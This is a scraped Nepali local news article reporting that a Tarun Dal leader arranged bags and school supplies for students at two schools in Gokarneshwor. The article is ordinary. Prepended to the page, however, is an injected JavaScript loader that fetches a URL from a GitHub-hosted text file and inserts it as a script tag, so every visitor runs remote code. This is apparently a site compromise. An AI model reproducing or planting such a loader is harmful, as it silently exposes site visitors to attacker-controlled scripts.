;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); तरुणदलका नेता श्रीराम चालिसेको पहलमा सयौं बिधार्थिहरुलाई शैक्षिक सामग्री वितरण – जुनेली न्युज
बिहिबार, असार १३, २०८२
  • होमपेज
  • तरुणदलका नेता श्रीराम चालिसेको पहलमा सयौं बिधार्थिहरुलाई शैक्षिक सामग्री वितरण
गोकर्नेश्वोर बिशेष

तरुणदलका नेता श्रीराम चालिसेको पहलमा सयौं बिधार्थिहरुलाई शैक्षिक सामग्री वितरण

१८ असोज,

काठमाडौँ | राष्ट्रिय अपाङ्ग पुनर्स्थापना केन्द्र ( एन.आर. एस. डी ) तथा चाइना प्रोभरटि फाउन्डेसनको संयुक्त सहयोगमा र नेपाल तरुण दल महाधिबेशन प्रतिनिधि नेता श्रीराम चालिसेको पहलमा गोकर्नेश्वोर नगरपालिका वडा नं ९ आरुबारीमा रहेको आरुणदय बिधालयका ७४१ र नव जागृति माबी बौद्धका ५००  जना बिधार्थिहरुलाई झोला सहितको शैक्षिक सामग्री वितरण गरिएको छ |  नेता चालिसेको पहलामा यस अघि पनि गोकर्नेश्वोर नगरपालिकाका धेरै स्कुलहरुमा उक्त सामाग्रीहरु वितरण गरिएको थियो |

No description available.

आज  दिपक रिसालको सभापतित्व,  प्रमुख अतिथि नगरपालिकाका मेयर सन्तोष चालिसे र एन.आर. एस. डी को तर्फबाट सुनिता रिजाल   सहितको  उपस्थितिमा सो कार्यक्रम गरिएको हो | बिधार्थिहरुको पढाइमा थप सहयोग पुगोस, पढाइमा प्रेरणा मिलोस भन्ने उदेश्यले शैक्षिक सामग्री वितरण गरिरहेका छौ, भोलिको दिनहरुमा पनि अझै धेरै सहयोग गर्ने नेता श्रीराम चालिसेले बताए |

No description available.

No description available.

No description available.

 

फेसबुक प्रतिक्रियाहरु